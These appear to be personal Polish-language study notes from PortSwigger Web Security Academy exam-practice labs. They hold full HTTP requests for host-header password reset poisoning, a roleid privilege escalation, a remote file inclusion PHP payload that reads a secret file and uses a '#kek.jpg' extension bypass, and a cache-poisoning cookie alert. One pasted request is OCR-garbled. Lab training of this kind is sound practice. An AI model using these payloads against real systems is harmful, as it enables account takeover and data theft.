I PODEJŚCIE, MASZYNKA A [Host Header+RoleId na zasobie admina+RFI]

Maszynka A stage1: Cel zdobycie carlosa
"Host header authentication bypass" lub "Host header poisoning via password reset", ""Password Reset Poisoning via Host Header"
Endpoint /new-password z username=carlos to żądanie wysłania linku resetującego — x-host ma skłonić appkę do zbudowania linku resetującego na Twojej domenie exploit-server.
Kontekst: nie mam dostepu do konta wiener, nie jestem zalgowana i mam zdobyć cookies carlosa.
https://github.com/DingyShark/BurpSuiteCertifiedPractitioner#http-host-header-attacks

POST /log-in HTTP/2
Host: 0af7004b03469209810f4e5200da0049.web-security-academy.net
X-Host: exploit-0a02007d033192c181864dfd017c00e7.exploit-server.net
Cookie: session=av3vf33LUSPteC7IVGQCNsFYqbYO73Xx; _lab=46%7cMCwCFCOHp1e5%2bfnnFj5mcdEQyCq%2f3d2xAhQhFwP7eXxQ2f5SBD5tb0lZ3XM0gPx9i7PluJihxqZ9wpPtiB8LSC0w7EMGdIDYLcLixNJGtbJFZ9GlyWr6mtxtZ6RfviSj5gLjf7sRAR9zUr%2ffaBtKEKpCSQ5utdI6e5y5GPOCT%2frgCAg%3d
Content-Length: 66
Cache-Control: max-age=0
Sec-Ch-Ua: "Not-A.Brand";v="24", "Chromium";v="146"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US,en;q=0.9
Origin: https://0af7004b03469209810f4e5200da0049.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0af7004b03469209810f4e5200da0049.web-security-academy.net/log-in
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

csrf=Xi17dTlfIz26S9Qhynifcdi23CxuuGNT&username=carlos&password=xxx


>>200

Musisz znaleźć endpoint, który inicjuje reset i wysyła e-mail z linkiem

POST /new-password HTTP/2
Host: 0af7004b03469209810f4e5200da0049.web-security-academy.net
X-Host: exploit-0a02007d033192c181864dfd017c00e7.exploit-server.net
Cookie: session=av3vf33LUSPteC7IVGQCNsFYqbYO73Xx; _lab=46%7cMCwCFCOHp1e5%2bfnnFj5mcdEQyCq%2f3d2xAhQhFwP7eXxQ2f5SBD5tb0lZ3XM0gPx9i7PluJihxqZ9wpPtiB8LSC0w7EMGdIDYLcLixNJGtbJFZ9GlyWr6mtxtZ6RfviSj5gLjf7sRAR9zUr%2ffaBtKEKpCSQ5utdI6e5y5GPOCT%2frgCAg%3d
Content-Length: 53
Cache-Control: max-age=0
Sec-Ch-Ua: "Not-A.Brand";v="24", "Chromium";v="146"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US,en;q=0.9
Origin: https://0af7004b03469209810f4e5200da0049.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0af7004b03469209810f4e5200da0049.web-security-academy.net/new-password
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

csrf=Xi17dTlfIz26S9Qhynifcdi23CxuuGNT&username=carlos


>>200 Please check your email for a reset password link.


ZDOBYCIE CARLOSA: token przyszedl na exploit logs
Password reset poisoning daje token w access logu (ofiara klika link → GET z tokenem w URL → log). Wymaga: wstrzyknięcia hosta + ofiary klikającej. Bez skryptu.


POST /new-password?temp-forgot-password-token=wuelp5um4qw4wi4l33g9xktwjdzmas9k HTTP/2
Host: 0af7004b03469209810f4e5200da0049.web-security-academy.net
Cookie: session=av3vf33LUSPteC7IVGQCNsFYqbYO73Xx; _lab=46%7cMCwCFCOHp1e5%2bfnnFj5mcdEQyCq%2f3d2xAhQhFwP7eXxQ2f5SBD5tb0lZ3XM0gPx9i7PluJihxqZ9wpPtiB8LSC0w7EMGdIDYLcLixNJGtbJFZ9GlyWr6mtxtZ6RfviSj5gLjf7sRAR9zUr%2ffaBtKEKpCSQ5utdI6e5y5GPOCT%2frgCAg%3d
Content-Length: 53
Cache-Control: max-age=0
Sec-Ch-Ua: "Not-A.Brand";v="24", "Chromium";v="146"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US,en;q=0.9
Origin: https://0af7004b03469209810f4e5200da0049.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: <meta name="referrer" content="no-referrer">
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

csrf=Xi17dTlfIz26S9Qhynifcdi23CxuuGNT&username=carlos


Maszynka A stage2: eskalacja na admina
zmiana roleid na zasobie admina

GET /myaccountdetails?id=carlos HTTP/2
Host: 0af7004b03469209810f4e5200da0049.web-security-academy.net
Cookie: _lab=46%7cMCwCFCOHp1e5%2bfnnFj5mcdEQyCq%2f3d2xAhQhFwP7eXxQ2f5SBD5tb0lZ3XM0gPx9i7PluJihxqZ9wpPtiB8LSC0w7EMGdIDYLcLixNJGtbJFZ9GlyWr6mtxtZ6RfviSj5gLjf7sRAR9zUr%2ffaBtKEKpCSQ5utdI6e5y5GPOCT%2frgCAg%3d; session=eiwPLWzuaTICQk6Wt0lh2RipDClVJpEX
Sec-Ch-Ua: "Not-A.Brand";v="24", "Chromium";v="146"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i




POST /myaccountdetails/update_email HTTP/2
Host: 0af7004b03469209810f4e5200da0049.web-security-academy.net
Cookie: _lab=46%7cMCwCFCOHp1e5%2bfnnFj5mcdEQyCq%2f3d2xAhQhFwP7eXxQ2f5SBD5tb0lZ3XM0gPx9i7PluJihxqZ9wpPtiB8LSC0w7EMGdIDYLcLixNJGtbJFZ9GlyWr6mtxtZ6RfviSj5gLjf7sRAR9zUr%2ffaBtKEKpCSQ5utdI6e5y5GPOCT%2frgCAg%3d; session=ofMv62EALvT61WXW2zFGQfLFFLzKKQ8t
Content-Length: 82
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not-A.Brand";v="24", "Chromium";v="146"
Content-Type: text/plain;charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Accept: */*
Origin: https://0af7004b03469209810f4e5200da0049.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0af7004b03469209810f4e5200da0049.web-security-academy.net/myaccountdetails?id=carlos
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

{"csrf":"qNXiL7lJGzDmIpTxsmZ0Yanjpsot4JJb","email":"carlos@carlos-montoya.net"
 }


HTTP/2 302 Found
Location: /myaccountdetails
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 130

{
  "username": "carlos",
  "email": "carlos@carlos-montoya.net",
  "apikey": "1Uzf57mJHAOMR3bCHhb27k6gXAX8QbyL",
  "roleid": 14
}


intruder
https://github.com/user-attachments/assets/6c6554fc-d37c-4092-9485-659a2683dc32
https://github.com/user-attachments/assets/25a60684-25c5-4d0b-9ca7-9847620ce0aa




POST /admincontrols HTTP/2
Host: 0af7004b03469209810f4e5200da0049.web-security-academy.net
Cookie: _lab=46%7cMCwCFCOHp1e5%2bfnnFj5mcdEQyCq%2f3d2xAhQhFwP7eXxQ2f5SBD5tb0lZ3XM0gPx9i7PluJihxqZ9wpPtiB8LSC0w7EMGdIDYLcLixNJGtbJFZ9GlyWr6mtxtZ6RfviSj5gLjf7sRAR9zUr%2ffaBtKEKpCSQ5utdI6e5y5GPOCT%2frgCAg%3d; session=ofMv62EALvT61WXW2zFGQfLFFLzKKQ8t
Content-Length: 126
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not-A.Brand";v="24", "Chromium";v="146"
Content-Type: text/plain;charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Accept: */*
Origin: https://0af7004b03469209810f4e5200da0049.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0af7004b03469209810f4e5200da0049.web-security-academy.net/myaccountdetails?id=carlos
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

{
 "username": "administrator","csrf":"qNXiL7lJGzDmIpTxsmZ0Yanjpsot4JJb","email":"carlos@carlos-montoya.net","roleid": 59
 }


>> 200


Maszynka A stage3: Przeczytać /home/carlos/secret/
https://github.com/DingyShark/BurpSuiteCertifiedPractitioner#6-admin-panel-rfi

Admin Panel RFI
RFI function on target allow the upload of image from remote HTTPS URL source and perform to validation checks, 
the source URL must be HTTPS and the file extension is checked. Incorrect RFI result in response message, File must be either a jpg or png.

RFI - bo target=aplikacja pobiera i wykonuje kod z remote, zdalnie z innego servera. to nie jest nic z lokalnym uploadem plikow.

1. przygotowanie pliku na exploit server + store: /shell.php + body <?php echo file_get_contents('/home/carlos/secret'); ?> 
2. upload pliku w przegladarce /shell.php i w burp przemieniam koncowke na shell.php%23kek.jpg      # zakodowany na %23, ale niekoniecznie tak musi byc.
3. SPRAWDZ na przykladzie prawilnego innego .jpg w jakim endpoincie zostaja zapisane pliki.
payload jest na serwerze. !exploit server nie wykonuje kodu php. wykonanie nastapi gdy target (aplikacja) pobierze i przetworzy kod. widze w logach ze bot wszedl na moj endpoint i jest 200 (/shell.php)
4. wchodzę w repeaterze na endpoint gdzieladuja sie zdjecia by odczytac secret /blogImage/shell.php



POST /admincont rols/imagefile HTTP/2
Host : Oaf7004b03469209810f4e5200da0049.web-security-academy. net
Cookie: lab=
46%7cMCwCFCOHp1e5%2b fnnFj5mcdEQy Cq%2f3d2xAhQhFwP7eXxQ2f5SBD5t bOl Z3xM0gPx9i7Pl uJihxqZ9wpPt iB8LSCOw7EMGdIDYL
cLixNJGt b JFZ9Gl yWr6mt xt Z6RfviSj 5gLj f7sRAR9zUr%2f faBt KEKpCSQ5ut dI6e5y5GPOCT%2frgCAg%3d; session=
of Mv 62EALvT61WXW2zFGQfLFFLzKKQ8t
Content-Length: 142
Cache-Control : max-age=0
Sec-Ch-Ua: "Not-A. Brand" ; v="24", "Chromium" ; v="146"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Plat form: "Linux"
Accept -Language: en-US, en ; q=0.9
Origin: https://Oaf7004b03469209810f4e5200da0049.web-security-academy.net
Content -Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent : Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0
Safari/537.36
Accept :
text/html,application/xhtml+xml, application/xml; q=0.9,image/avif, image/webp,image/apng, */ *; q=0.8, applicati
on/signed-exchange; v=b3; q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User : ?1
Sec-Fetch-Dest : document
Referer: https://Oaf7004b03469209810f4e5200da0049.web-security-academy . net/admincontrols
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

csrf=qNXiL7l JGzDmIpTxsmZOYanjpsot 4JJb&ImageUrl=
https%3A%2F%2Fexploit-Oa02007d033192c181864dfd017c00e7.exploit-server.net%2Fshell.php%23kek.jpg



EXPLOIT SERVER - STORE!

pytanie, jaki endpoint Exploit server:
https://exploit-server.com/shell.php dawał 200 w logach.
https://exploit-server.com/shell.php#kek.jpg dawał 400 w logach

body:
<?php echo file_get_contents('/home/carlos/secret'); ?>

przegladarka:
pytanie jaki link na stronie zuploadowany, chyba ten z 200. gdy ofiara go zobaczyla, przychodzil jej secret na endpoint /blogImage/shell.php
https://exploit-server.com/shell.php dawał 200 w logach.
https://exploit-server.com/shell.php#kek.jpg dawał 400 w logach

Na ten endpoint przychodzi secret carlosa:
GET /blogImage/shell.php
https://github.com/user-attachments/assets/da5b67c8-aac6-44ca-8f20-fb0287aa69e8


I PODEJŚCIE, MASZYNKA B [Web Cache+?+?]


Maszynka B stage1: Web cache poisoning dopiero na fukcji szukania znaleziony
inne cechy: forgot passowrd, change email, skaner nic nie wykrywa, no hiddern params.

1. przygotowuje exploit server z endpointem /resources/js/tracking.js body: alert(document.cookie)
w re
2. robie kaszowanie w repeaterze /?cb=1 żeby sprawdzić czy wykonuje się kod w przegladarce i uzywam cb żeby nie czekac 30 sekund na kolejna probe






II PODEJŚCIE csrf statyczny dla wszystkich userow



POST /my-account-details HTTP/2
Host: 0a0b0036034d6688801803a000ed009d.web-security-academy.net
Cookie: session=J7UP9Aq5sDWuRtxzFr46HUprjBL16Bgp; _lab=46%7cMCwCFHc%2bIcED2Devkwv8bvMBV2KH5HcoAhQWZR%2fueyaslHS9FR%2b7h7jcibL6EW78jVOZJTWCH7bvHjLGk1Uvz%2bc8ajOSjOA%2bd%2bl4TMPm1Hsn%2b%2f7pwKzGoCxCLVe9MGubBPFVLvx4JX0jXh0TVi78K4%2bqMePXbyP3oUEkMx%2b8RyRkvUI%3d
Content-Length: 53
Cache-Control: max-age=0
Sec-Ch-Ua: "Not-A.Brand";v="24", "Chromium";v="146"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US,en;q=0.9
Origin: https://0a0b0036034d6688801803a000ed009d.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a0b0036034d6688801803a000ed009d.web-security-academy.net/forgot-password
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

csrf=BHLO66SdGxYt4D6h4d3z9cyn8Zfn31Xb&username=carlos



przekierowanie do logowania
HTTP/2 302 Found
Location: /hello
X-Frame-Options: SAMEORIGIN
Content-Length: 0


  
